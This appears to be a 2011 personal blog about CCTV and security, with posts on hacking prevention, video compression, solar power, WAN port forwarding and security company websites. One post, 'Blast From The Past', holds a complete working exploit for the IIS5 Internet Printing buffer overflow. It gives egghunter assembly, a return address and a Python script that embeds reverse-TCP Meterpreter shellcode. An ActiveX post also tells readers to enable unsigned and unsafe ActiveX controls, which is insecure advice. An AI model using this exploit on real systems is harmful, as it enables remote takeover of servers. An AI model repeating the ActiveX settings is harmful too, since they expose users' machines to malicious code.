Sunday, July 24, 2011

How to Avoid Getting Hacked video

In 1995, a movie called Hackers debuted showing the life of a group of hackers and what kind of trouble they can cause. Hacking is still an ongoing problem today and as a result has crept into the security market through integrated information systems. In this article I’ll share some tips that can help you keep this cyber intrusion away from your home or business.

Generally, most technologically people get excited about the idea of being able to turn on lights, view security cameras, and control other gadgets at home with a Smart Phone. Unfortunately, there are criminals learning how to break into your systems despite increased security and better technology. So as you log in and review footage on your DVR or control feature of your Smart Home, a cyber thief could be following your every move. The best way to keep these so called cyber criminals from hacking into your system is to use encryption. If you leave any part of your system unencrypted, you’ve already created a huge vulnerability.

Many people in the residential market or in small businesses do not need to go to such extremes as encrypting video feeds. It may be necessary though if you’re trying to protect priceless property or have had issues in the past with people trying to steal certain items.

Some DVRs have a watermark feature to aid in preventing theft. This feature can help a viewer tell the difference between a genuine feed and a fake. I also recommend changing user names and passwords on a regular basis. You don’t want to leave your system with the factory defaults of admin/admin or 12345. Login information like this is what hackers are going to try first. Many customers have asked me to log into their systems and when I ask them what their user name and password is, they often respond saying, “I don’t know who set it up, I just have it saved to auto log in”. This is not a good practice and won’t keep your system secure. Remember if you want to keep your security system safe from hackers, you must, first, keep it safe from a 5 year old.

Monday, July 18, 2011

How to Selecting the right CCTV video compression

If you are responsible for planning or designing a new CCTV video surveillance system, you have to make a technology choice regarding which video compression technique to use.

For sure, it will be digital. But which video compression scheme is the most suitable for your application?

1. Motion JPEG CCTV video compression
The JPEG standard was developed by the Joint Photographic Expert Group (part of ISO) for efficient storage of individual frames. Motion JPEG or M-JPEG is a series of separate JPEG images that form a video sequence. When 16 JPEG image frames or more are joined together per second, the result is an illusion of motion video. Video reproduction at 30 frames per second (FPS) for NTSC signals or 25 FPS for PAL signals is called full motion video or continuous-motion video.

Although Motion JPEG is an unlicensed standard it is widely compatible with many applications that require low frame rates or technologies such as Video Analytics where frame by frame analysis is crucial.

Advantages
1. Ability to support multi-mega pixel resolution.
2. Ideal for courtroom single frame evidence.
3. Clearer images at lower frame rates than MPEG-4.
4. Frame by frame playback offers more frames to view.
5. Technology is simpler; this can reduce the cost of a camera or video codec.
6. At low bandwidth priority is given to Image Resolution.
Disadvantages
1. High bit rate for scenes with little or no activity increases bandwidth and storage.
2. Video quality deteriorates at higher compression ratios.
3. No M-JPEG standard often means incompatibility issues.
4. Converting M-JPEG into another format reduces video quality.
5. Dated technology superseded by more bandwidth-efficient encoding techniques.

MPEG-4 CCTV video compression
MPEG-4 is a compression standard that was introduced in late 1998 by the Moving Picture Experts Group. In video surveillance applications MPEG-4 Part 2, also known as MPEG-4 Visual is the version of MPEG-4 most commonly used. MPEG-4 supports both low-bandwidth applications and those applications that require high quality images, with virtually unlimited bandwidth and no limitations in frame-rate. Typically most MPEG-4 based encoders and cameras support video up to DVD quality.

MPEG-4 is much more efficient than M-JPEG because video frames are analysed prior to being sent across the network. The first compressed image (I frame) is used as a reference point, the following images only contain information that differs to the initial I frame reference image. Periodically I frames are transmitted within the video sequence to ensure a recent reference point. The distance between these I frames is known as the GOP (Group of Pictures). The distance between I frames is usually user definable depending on the application and activity in the scene. For example a 25 FPS video stream with a GOP of 50 would mean a new I frame with GOP change information is sent every 2 seconds. The viewing application on the receiving end of the transmission then reconstructs all images based on this information and displays the video.

Advantages
1. MPEG-4 up to 5 times more efficient than M-JPEG at low bandwidths.
2. Increases the amount of time video can be stored compared with M-JPEG.
3. Uses less network bandwidth when compared with M-JPEG.
4. Very efficient at high frame rates.
Disadvantages
1. When the bit-rate is limited video quality suffers.
2. Low efficiency at very low frame-rates or extremely high scene activity.
3. Can be liable to “blurring” on freeze frame or very high motion.

H.264 CCTV video compression
H.264 is the latest MPEG standard for video encoding that is geared to take video beyond the realms of DVD quality by supporting Hi Definition CCTV video. H.264 can also reduce the size of digital video by more than 80% compared with M-JPEG and as much as 50% with MPEG-4, all without compromising image quality. This means that much less network bandwidth and storage space are required. Since the typical storage costs for surveillance projects represent between 20 and 30 percent of the project cost significant savings can be made.

Like many sectors of our industry, the devil is in the detail and system integrators and end-users who wish to see the benefits of an IP-based solution should look to someone who really knows the technology and can give an impartial view. It is common sense that manufacturers will only support their own hardware and will promise the earth for it, whereas a distributor will have evaluated a number of solutions from different vendors and be able to say that product A is the best for solution B because of XYZ whereas product Y is the best for solution C because of etc etc.

Advantage
1. H.264 cameras is that they reduce the amount of bandwidth needed.if your megapixel camera needed 10 Mb/s before (with MJPEG), it might now need only 1.5 Mb/s. So for each camera, you will save a lot of bandwidth.
2. Eliminates barriers: Enables many more networks to support megapixel cameras.
3. The bitstream is fully compatible with existing decoders with no error/drift.
Disadvantages
1. Using analytics with these cameras reduces the H.264 benefit.
2. Costs few hundred dollars more per camera.

Saturday, July 16, 2011

Active X & Direct X Troubleshooting for Windows 2000 & XP

Time by Time I got call from Technician/Engineers/Sr. Engineers/Managers says” Hi Arindam I got your ref from XYZ actually we facing problem with Active X Component installing on Windows XP PC/Laptop “. Yes many sites in India on the Internet use Active X or Direct X controls to display web content. If you are having the following issues, the below instructions offer possible solutions. Before applying this you must knowing PC administrator Password.



Issues:
  • Active X or Direct X Will Not Load
  • WINXP IE Service Pack 2 Not Allowing Load
The following applies to Windows 2000 and Windows XP, and is meant to be used by experienced PC users ONLY.
  • Open Internet Explorer, click on Tools, click on Internet Options
  • Click on the Security Tab
  • Click to Highlight Internet, click Custom Level button
    • .NET framework-Run Authenticode not signed—click to ENABLE
    • Run components signed with Authenticode—- click to ENABLE
    • ActiveX controls and plug-ins
      • Automatic prompting for ActiveX controls—- click to ENABLE
      • Binary and scripting behaviors—- click to ENABLE
      • Download signed ActiveX controls—- click to ENABLED
      • Download unsigned ActiveX controls—- click to ENABLED
      • Init and script ActiveX controls not marked as safe—- click to ENABLED
      • Run ActiveX controls and plug-ins—- click to ENABLE
      • Script ActiveX controls marked safe for scripting—- click to ENABLED
  • Downloads
    • Auto prompt for downloads—- click to DISABLE
    • File downloads— click to ENABLE
    • Font download—- click to ENABLE
  • Java VM
    • Java permissions—— click to HIGH SAFETY
    • Access data sources across domains—- click to DISABLE
    • Allow META REFRESH—- click to ENABLE
    • Allow scripting of IE web-browser controls—- click to DISABLE
    • Allow scripting of windows without size or position—- click to DISABLE
    • Allow web pages to use restricted protocols for active— click to PROMPT
    • Display mixed content—– click to PROMPT
    • Don’t prompt for client certificate selection —— click to DISABLE
    • Drag and drop or paste files—– click to ENABLE
    • Installation of desktop items—-PROMPT
    • Launch programs and files in an IFRAME—- click to PROMPT
    • Navigate sub-frames across different domains— click to ENABLE
    • Open files based on content, not file extensions—- click to ENABLE
    • Software channel permissions—– click to MEDIUM SAFETY
    • Submit non-encrypted form date—- click to ENABLE
    • Use Pop-Up blocker—- click to ENABLE
    • User data persistence—– click to ENABLE
    • Web site in less privileged web content zone can navigate—- click to ENABLE
  • Scripting
    • Active scripting—– click to ENABLE
    • Allow paste operations via script—– click to ENABLE
    • Scripting of Java applets—- click to ENABLE
  • User Authentication
    • Logon
      • click to Automatic logon only in Intranet zone

Saturday, June 25, 2011

Components of a stand alone solar PV system for CCTV System


Sunlight to Electricity is photovoltaic technology converts sunlight into electricity and is emerging as a major power source for CCTV due to its numerous environmental and economic benefits and proven reliability. Enough free sunlight falls on earth to supply our energy needs for years to come.
Environmental Benefits: As PV generates electricity from light, PV produces no air pollution or hazardous waste. It doesn't require liquid or gaseous fuel to be transported or combusted.


Economic and Social Benefits: Sunlight is free and abundant. A photovoltaic system allows you to generate electricity and store it for use when needed. Photovoltaic contributes to our energy security, as a young technology, it creates jobs and strengthens the economy. It frees us from uncertainties and foreign oil dependence.

This energy source is free, clean and highly reliable. PV systems are long-lasting and require little maintenance. The benefits of Photovoltaic’s far outweigh the initial cost the systems.

Solar Panels (PV) Modules
The DC electricity produced by the solar panel or module(s) is used to charge batteries via a solar charge controller. Any DC appliances that are connected to the battery will need to be fused.  DC lights are normally connected to the charge controller. Any AC appliances are powered via an inverter connected directly to the batteries. NOTE: inverters used in grid tie and stand alone systems are different and should not be interchanged.
Most stand alone PV systems need to be managed properly. Users need to know the limitations of a system and tailor energy consumption according to how sunny it is and the state of charge (SOC) of the battery.
Configuration
The solar panels need to be configured to match the system DC voltage, which is determined by the battery. System voltages are typically, 12V DC and 24V DC, larger systems will operate at 48V DC.
The operating voltage of a solar panel in a stand-alone system must be high enough to charge the batteries. For example, a 12V battery will require 14.4V to charge it. The solar panel must be able to deliver this voltage to the battery after power losses and voltage drop in the cables and charge controller and in conditions in which the solar cells operate at a high temperature. A solar panel with a Voc of about 20V is required to reliably charge a 12V battery.
Charge Controllers (Solar controller (or solar regulator))
A charge controller is designed to protect the battery and ensure it has a long working life without impairing the system efficiency. Batteries should not be overcharged and the function of the charge controller is to ensure that the battery is not over charged.
  • Charge controllers are designed to function as follows:
  • Protect the battery from over-discharge, normally referred to as low voltage disconnect (LVD) that disconnects the battery from the load when the battery reaches a certain depth of discharge (DOD).
  • Protect the battery from over-charging by limiting the charging voltage - this is important with sealed batteries - it is usually referred to as high voltage disconnect (HVD).
  • Prevent current flowing back into the solar panel during the night, so called reverse current.

NOTE: controllers with MPP tracking will ensure that the solar modules operate at optimal rating and can increase output by 10% or more.
Batteries
The power requirements of stand alone pv systems are rarely in sync with the battery charging. Appliances and loads need to be powered when there is sufficient solar radiation, during overcast weather and during the night. Bad weather may last for several days and the daily charging and discharging of the batteries takes its toll on them. Batteries that are able to handle the constant charging and discharging are known as deep cycle batteries. Batteries need to have a good charging efficiency, low charging currents and low self-discharge.
Battery Ah Efficiency
The Ah efficiency of a battery describes the relationship between Ah that are put into the battery and the Ah that are taken out. Under ideal conditions a new deep-cycle battery would be 90% efficient.
Choosing the most appropriate battery
The important characteristics to look for are:
  • capacity
  • cycle life
  • price / performance
  • size and space requirements
  • Ah efficiency
  • self-discharge rate
  • installation - vertical or horizontal
  • environmental - will batteries be placed near water supplies or in wildlife parks etc

Friday, June 10, 2011

Blast From The Past

Hi visitor I am from Kolkata, India. Its very simple and short Tutorial on my personal exp.
Recently on a test I ran into a windows 2000 server running iis5 with the Internet Printing module enabled, I was quite surprised by this but...a shell is a shell right? Since this was on the job and I wasn't wearing my cowboy hat I fired up my windows 2000 VM (who doesn't have one of those?) and went to work. Metasploit has a module for this vuln (exploit/windows/iis/ms01_023_printer) but surprisingly it is pretty flakey. On the first run of the exploit module it did not work so I took a look at my configuration of IIS again to make sure that everything was setup properly. After confirming IIS settings I tried the module a couple more times and finally was able to get a shell. I restarted IIS and tried the module a few more times...it was still hit or miss - sometimes it would work on the first try sometimes it would take three tries, something was strange....

After breaking out immunity debugger it became clear as to why the exploit did not work everytime. According to the metasploit module the shellcode was being held at an offset of EBX and with a short assembly stub we jump to that location (see metasploit snippet below)

buf = make_nops(280)
buf[268, 4] = [target.ret].pack('V')

# payload is at: [ebx + 96] + 256 + 64
buf << "\x8b\x4b\x60" # mov ecx, [ebx + 96]
buf << "\x80\xc1\x40" # add cl, 64
buf << "\x80\xc5\x01" # add ch, 1
buf << "\xff\xe1" # jmp ecx

sock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n")

While this does work, it appears that sometimes the payload is not within the window and the exploit is not successful. Since we know about where in memory our payload will be when we gain control of EIP seems like a good place to use an egghunter :) I started out with an existing egghunter(http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf) and modified it a little since I know about where in memory my payload is there was no sense looking everywhere for it :) A warning ahead of time - I was lazy and nop'd out the access violation check...I had plenty of bytes to burn ;) -

mov edx, ebx #ebx is the area of our starting point
or dx, 0fff
xor dx,0fff #clear out the bottom half of edx for the start of our loop
inc edx #increment edx - this is the start of our loop
nop #abbreviated nops where the original access violation check was
...
...
mov eax, 57303054 #load our egg "W00T"
mov edi, edx #set edi to point at our current location in memory
scas dword ptr es:[edi] #compare our egg to dword at edi
jnz #jump back to the start of our loop (inc edx) if we didnt find the egg
scas dword ptr es:[edi] #compare our egg to the next dword for the 2nd part of the egg
jnz #jump back to the start of our loop (inc edx) if we didnt find the 2nd egg
jmp edi #jump to edi as it points to the first byte after our egg
After implementing the egghunter into the exploit I had no issues getting a shell everytime :)

Full exploit below - obviously will have to change the shellcode for it to work for you -

import urllib2
import sys

shell= "T00WT00W"
shell +="\x90"*(10)

########################################################################################################
# msfpayload windows/meterpreter/reverse_tcp lhost=192.168.170.1 R|msfencode -e x86/alpha_upper -t c #
########################################################################################################
shell += ("\x89\xe1\xd9\xe8\xd9\x71\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43"
"\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41"
"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x4b\x39\x43\x30\x45"
"\x50\x45\x50\x45\x30\x4d\x59\x4a\x45\x50\x31\x4e\x32\x45\x34"
"\x4c\x4b\x46\x32\x50\x30\x4c\x4b\x51\x42\x44\x4c\x4c\x4b\x51"
"\x42\x44\x54\x4c\x4b\x43\x42\x46\x48\x44\x4f\x4f\x47\x50\x4a"
"\x46\x46\x46\x51\x4b\x4f\x46\x51\x49\x50\x4e\x4c\x47\x4c\x43"
"\x51\x43\x4c\x44\x42\x46\x4c\x51\x30\x49\x51\x48\x4f\x44\x4d"
"\x43\x31\x49\x57\x4b\x52\x4a\x50\x46\x32\x51\x47\x4c\x4b\x50"
"\x52\x42\x30\x4c\x4b\x47\x32\x47\x4c\x45\x51\x48\x50\x4c\x4b"
"\x47\x30\x42\x58\x4b\x35\x4f\x30\x42\x54\x51\x5a\x43\x31\x4e"
"\x30\x50\x50\x4c\x4b\x47\x38\x42\x38\x4c\x4b\x46\x38\x51\x30"
"\x45\x51\x49\x43\x4d\x33\x47\x4c\x50\x49\x4c\x4b\x47\x44\x4c"
"\x4b\x43\x31\x4e\x36\x50\x31\x4b\x4f\x46\x51\x49\x50\x4e\x4c"
"\x49\x51\x48\x4f\x44\x4d\x45\x51\x48\x47\x47\x48\x4d\x30\x42"
"\x55\x4b\x44\x44\x43\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x46\x44"
"\x44\x35\x4a\x42\x50\x58\x4c\x4b\x50\x58\x46\x44\x45\x51\x49"
"\x43\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x48\x45\x4c"
"\x43\x31\x49\x43\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x48\x50\x4d"
"\x59\x51\x54\x47\x54\x47\x54\x51\x4b\x51\x4b\x43\x51\x46\x39"
"\x51\x4a\x46\x31\x4b\x4f\x4d\x30\x50\x58\x51\x4f\x51\x4a\x4c"
"\x4b\x42\x32\x4a\x4b\x4b\x36\x51\x4d\x42\x48\x46\x53\x46\x52"
"\x43\x30\x43\x30\x43\x58\x42\x57\x42\x53\x47\x42\x51\x4f\x50"
"\x54\x43\x58\x50\x4c\x43\x47\x46\x46\x43\x37\x4b\x4f\x49\x45"
"\x48\x38\x4a\x30\x45\x51\x45\x50\x45\x50\x46\x49\x49\x54\x50"
"\x54\x50\x50\x45\x38\x46\x49\x4b\x30\x42\x4b\x45\x50\x4b\x4f"
"\x48\x55\x46\x30\x50\x50\x46\x30\x46\x30\x47\x30\x46\x30\x51"
"\x50\x46\x30\x42\x48\x4b\x5a\x44\x4f\x49\x4f\x4d\x30\x4b\x4f"
"\x49\x45\x4a\x37\x42\x4a\x43\x35\x45\x38\x4f\x30\x49\x38\x4f"
"\x5a\x43\x31\x45\x38\x44\x42\x43\x30\x42\x31\x51\x4c\x4c\x49"
"\x4a\x46\x43\x5a\x42\x30\x50\x56\x51\x47\x43\x58\x4a\x39\x49"
"\x35\x43\x44\x43\x51\x4b\x4f\x48\x55\x4d\x55\x4f\x30\x43\x44"
"\x44\x4c\x4b\x4f\x50\x4e\x43\x38\x44\x35\x4a\x4c\x45\x38\x4a"
"\x50\x48\x35\x4f\x52\x50\x56\x4b\x4f\x48\x55\x43\x5a\x43\x30"
"\x43\x5a\x44\x44\x46\x36\x51\x47\x42\x48\x45\x52\x4e\x39\x4f"
"\x38\x51\x4f\x4b\x4f\x48\x55\x4c\x4b\x47\x46\x43\x5a\x51\x50"
"\x42\x48\x45\x50\x42\x30\x43\x30\x43\x30\x50\x56\x42\x4a\x45"
"\x50\x45\x38\x50\x58\x4e\x44\x46\x33\x4b\x55\x4b\x4f\x49\x45"
"\x4a\x33\x46\x33\x43\x5a\x43\x30\x50\x56\x51\x43\x50\x57\x42"
"\x48\x44\x42\x48\x59\x4f\x38\x51\x4f\x4b\x4f\x4e\x35\x45\x51"
"\x49\x53\x51\x39\x49\x56\x4d\x55\x4c\x36\x43\x45\x4a\x4c\x4f"
"\x33\x44\x4a\x41\x41")


egghunter="\x8B\xD3\x66\x81\xCA\xFF\x0F\x66\x81\xF2\xFF\x0F\x42\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xB8\x54\x30\x30\x57\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"


buff = 'A'*268 + '\x4d\x3f\xe3\x77' +"\x90"*5 + egghunter + '\x90'*156
useragent = 'Shit Bird'
header = {'User-Agent':useragent, 'Host':buff}

req = urllib2.Request('http://'+sys.argv[1]+'/NULL.printer?'+shell,headers = header)
res = urllib2.urlopen(req)
res.close()

Saturday, June 4, 2011

How do I setup IP forwarding/filtering with the Connect WAN

Introduction
The WAN supports four features which provide security and IP traffic forwarding when using incoming or Mobile Terminated connections:
1.      Network Address Translation (NAT)
2.      Generic Routing Encapsulation (GRE) forwarding
3.      TCP/UDP port forwarding
4.      IP Filtering
This document describes each function, how they are used in conjunction with each other, how they are used, and what issues can occur with each if not used properly.

Network Address Translation (NAT)
NAT allows the Connect WAN to have a single public IP address on the mobile link, while allowing multiple private IP addressed devices connected to the Ethernet interface. 
Outgoing traffic (mobile initiated) from the private network to the public mobile network assumes the IP address of the public mobile interface.  An internal table tracks which internal IP address made the outgoing request so that responses get sent to the proper requestor.
For example, a workstation at IP address 192.168.1.15 sends a request to www.arindamcctvaccesscontrol.blogspot.com.  The source IP address is changed by the Connect WAN address translation to the public 
Incoming (mobile terminated) traffic is either designated to the Connect WAN itself (i.e. HTTP or telnet connections for configuration or monitoring), or is forwarded to hosts via the Ethernet interface based either on GRE or TCP/UDP port forwarding which is covered below.
NAT provides two main benefits:
1.      Security: NAT hides the Private IP addresses of the devices on the Connect WAN''''s Ethernet network.
2.      IP Address Availability: IP addresses are in short supply and cost money.  The Connect WAN need be provided only one IP address from the wireless carrier.
NAT is enabled by default on the Connect WAN.  It should not be disabled unless there is a specific reason to do so.

Generic Routing Encapsulation (GRE) forwarding
GRE is a transport layer protocol, designated as IP protocol number 47, is used by many routers, WAN switches and VPN concentrators, to effectively tunnel traffic over a WAN between routers.  Note that GRE itself provides no encryption but protocols such as PPTP can use GRE.  IPSec can be encapsulated in GRE (and vice-versa).  GRE uses IP-in-IP and allows private IP addresses to be tunneled through a public network.

The Connect WAN provides a simple checkbox to turn on GRE forwarding to pass GRE traffic from the mobile interface through to a router on the Ethernet interface.  Note the Connect WAN only passes GRE traffic and does not terminate it.
Here is an example diagram:
Figure 1 - GRE Forwarding
The HQ router''s peer GRE address is the mobile IP address of the Connect WAN, which in this case is 166.213.229.218.  The Connect WAN has GRE forwarding enabled and will send to the router''s Ethernet WAN port, in this case 192.168.1.2.  Typically this connection is a directly connected Ethernet cable.
An example similar to the above is where GRE tunneling is used to create a backup WAN connection to a primary Frame Relay connection through the Connect WAN and wireless network. 

TCP/UDP Port Forwarding
Normally, traffic initiated from a host site to a Connect WAN is blocked by NAT, unless the traffic is destined for the Connect WAN itself.  Port forwarding provides a means to pass traffic from the mobile interface to devices connected to the Connect WAN''''s Ethernet port.  There are two main applications where port forwarding is required:
1.      Pass application data traffic, such as polls or requests, to Ethernet connected devices, and
2.      Pass VPN traffic, such as IPSec-in-UDP, through to routers or VPN appliances.
For example, three devices are attached to the Connect WAN''''s Ethernet port:
Figure 2 - TCP Port Forwarding
The application uses a protocol that polls the devices using the device IP address and TCP port 502 (which is Modbus).  On local LANs and publicly routable IP addresses this is not a problem. 
NAT hides the private Ethernet IP addresses of the devices connected behind the Connect WAN''''s Ethernet port.  The application can then only send polls to one IP address the mobile IP in this case 166.213.229.218. 
TCP port forwarding is used to forward the IP polls to one or more devices on the Connect WAN Ethernet port.  Different TCP port numbers are used to designate which device gets the proper traffic. The application must be able to support changing the TCP protocol port number from the default of 502.  In this case the application is configured to poll according to this table:
Remote Device
Destination IP Address
Destination TCP Port
One
163.213.229.218
12001
Two
163.213.229.218
12002
Three
163.213.229.218
12003
Notice the destination IP address is the Connect WAN''''s mobile IP address.
The Connect WAN is configured with a TCP/UDP forwarding table as follows:
Source TCP Port
Destination IP Address
Destination TCP Port
12001
192.168.1.2
502
12002
192.168.1.3
502
12003
192.168.1.4
502
Incoming traffic is then routed to the proper device.  The devices can use their standard TCP port of 502.
The main issue with port forwarding in this case is when the polling application does NOT allow the user to specify the TCP or UDP port used.  The workaround is to use routers that support GRE, VPN, or other forms of tunneling that can be forwarded through the Connect WAN.
Another example of port forwarding is forwarding of IPSec-in-UDP traffic to a VPN appliance or router attached to the Connect WAN''''s Ethernet port.  Figure 1 above shows a GRE tunnel.  In much the same way, IPSec traffic can be encapsulated in UDP to prevent NAT from modifying the IPSec headers (which would invalidate the traffic).  IPSec-in-UDP implementations always use UDP port 500 for IKE/ISAKMP, but can use various UDP port numbers for the AH/ESP traffic.  Here is an example of UDP port forwarding entries on a Connect WAN for IPSec in UDP:
Protocol
Source Port
Destination IP Address
Destination Port
UDP
500
192.168.1.2
500
UDP
4500
192.168.1.2
4500

IP Filtering
IP Filtering is a security feature that allows the user to block all incoming, mobile terminated traffic into the Connect WAN except for traffic from specific IP addresses and/or subnets.  There are three IP Filtering settings on the Connect WAN:
1.      Only allow access from the following devices and networks.  When checked this blocks ALL incoming traffic except for the traffic from the IP address/subnets listed in the "allow access" tables.
2.      Automatically allow access from all devices on the local subnet.  This allows out-bound traffic from the private Ethernet network out to the mobile network and beyond.
3.      Allow access from the following devices and/or subnets.  When the "Only allow access from the following devices and networks" box is checked, you must provide entries here to allow in-coming mobile traffic to be passed through the Connect WAN.
CAUTION: Incorrect settings here can stop some or all traffic.  For example, checking "Only allow access from the following devices and networks" without adding IP addresses or subnets to the "allow access" tables will block ALL incoming traffic, even responses from outgoing requests.

Monday, May 30, 2011

Three Common Mistakes made with Security Company Websites

Find out the three biggest mistakes you can make with your security company website.

I’ve visited a lot of Security and Investigation websites over the years, more so than most people ever will. I’ve also built 100’s of websites over the last decade, so I have an idea of what works and what doesn’t. Some sites are fantastic promotional tools for the company. Many in the security industry though leave a lot to be desired.

Below I’ll cover some of the biggest mistakes I’ve seen on Security Company Websites and give you an insight into why.

1. We are the leading security company
Really? Are you sure? Did you know that the potential client just visited 10 of your competitors and 8 of them said exactly the same thing. Who are they to believe? In a world where information is fast and quick at hand, where your competitors are only a few clicks away, sprouting to the world that you are the leading company does not inspire confidence. In fact it can have a negative effect when everyone else is saying exactly the same thing.

Find ways of inspiring confidence in your product or services that don’t require you to make claims without validation.

2. We offer Security Services Melbourne, Guards Melbourne, CCTV Melbourne, Alarms Melbourne
We get the point, you offer services in Melbourne. But who exactly do you think will be reading the words on your website? Potential clients? Existing clients? What are they going to think when you repeat words over and over to the point where it becomes painful to read? It’s not like you’d ever use a sentence like that when talking to them face to face, but that’s what your website is doing.

Now some of you reading this may be thing why on earth would anyone do that. Well some web designers, so called search engine optimisation experts and some people that just read the wrong things online think that if you repeat words over and over that you’ll get better search engine rankings. To an extent this is somewhat true. I mean the search engines are just programs and need to figure out what your page is about. So including on-topic keywords “within reason” helps the search engines get a better picture of what your company is all about.

The biggest problem with this though lies in the fact that the page will be read by humans, your potential clients. Even if you get the better rankings, what are those potential clients going to think when they read that? You may also find yourself penalized and lose your rankings in the search engines, but that’s another story. There are a lot of factors that go into search engine rankings, so focus on things that don’t require making a mockery of the English language. So to keep it simple, write for humans first, search engines second.

3. Last updated 2007
Do you still exist? You must since you paid your webhosting and domain name fees all this time, but do potential clients know that? A website built in the style of the last millennium also doesn’t inspire much trust or professionalism.

Now not everyone that set-up their website a long time ago believes the internet holds any value for their business. It probably didn’t work for them then and hence forth it probably won’t work now. The website though is a reflection of your business and speaks volumes about your attitude towards potential clients.

A quick update is in store and you don’t even have to break open the piggy bank to do so. With all the how-to websites around, with kids these days learning to build websites in school, I’m sure most companies could find a way to upload at least a one page site to replace that dinosaur. Keep it simple, present it neatly and include all relevant information. It should be a pretty quick thing.

How much is one new client that finds you on the net worth to your security business over a number of years anyway?

Sunday, May 1, 2011

Reduce Crime with Wireless/ non-Wireless CCTV Systems

CCTV Cameras are probably the best ways to reduce crime with your business or home, and there are numerous of places to purchase CCTV equipment. Below are a few factors to consider once shopping for CCTV cameras that will help you save time and expense, as well as help you to preferable to protect your home.

CCTV systems are used in public places all over the world for crime prevention. Or in the case of a crime being committed, the footage from the cameras can be used to apprehend and convict the perpetrators, perhaps even recover stolen property. And if they are wireless CCTV systems, it’s even more convenient.

CCTV systems for homes and work are, of course, not as elaborate as the ones used in huge malls or city streets. But they follow the same principle. The signal from the cameras is transmitted to only a limited number of screens or monitors. The footage is recorded so you can view it at your convenience. The system is quite easy to set up so you don’t have to pay a technician to come over and install it. Since they are wireless and there are no cables to get tangled up in, you can change the location of the cameras as and when you wish. Wireless CCTV cameras are fast becoming the ultimate tool in the fight against crime.

Rather than hire security personnel, most people are choosing CCTV systems to monitor their home or business. Security guards gain a lot of knowledge about your property and your comings and goings even if they’re on the job for just a week. This information can prove invaluable to planning a break-in. No matter how clean their background checks, who can you really trust nowadays?

The sight of a CCTV camera on your property will psychologically impair a burglar’s nerve to break and enter. Security experts aver that this is the main reason that CCTV systems are so effective in preventing crime. If the criminal plans to go ahead with the crime regardless, there’s a greater chance that the fear will make him bungle the job and get caught anyway. Statistics show that shops and convenient stores that have visible CCTV cameras have fewer instances of shop-lifting or “stick-ups”.

Where to Set Up Your Wireless CCTV System

Survey the property that you want to protect. You’ll want a camera at all entry and exit points including windows. You can also install infrared cameras outside your home for night-time surveillance. If the system is for your shop, consider all areas of the shop that are not directly visible from the cashier’s desk. Then, of course, there’s the cash counter. Consider any area that might be an advantage to a burglar, and put up a camera there. The receiver and monitors should be installed in an area where you spend most of your time.

Some CCTV systems come equipped with motion sensors. So it is only when the system detects an intruder that the cameras will come on, accompanied by a piercing alarm. Some security systems will even call the police or your cell phone to alert you. This is especially useful if you’re away a lot or if you don’t have the resources to man someone at the monitors all day.

The form of your camera will even play a huge part in how well hidden you is, and exactly how secure you can your office or home. Often times, if a surveillance camera is very obvious or large, criminals will immediately try and destroy the camera before stealing merchandise or money, or otherwise not damaging the home. If your CCTV camera is well hidden, it will be a hardship on burglars to obtain the camera, and it's also more likely that you're going to catch the trespassing on tape accurately. A discreet camera will likely make customers forms of languages in your house feel safer. So, small cameras, dome-shaped cameras, and in many cases submergible cameras make the perfect idea if you wish to add a little more security to your dwelling or business.

Don’t wait till you’re the victim of a crime before taking precautions. Install a wireless CCTV system today and sleep easy.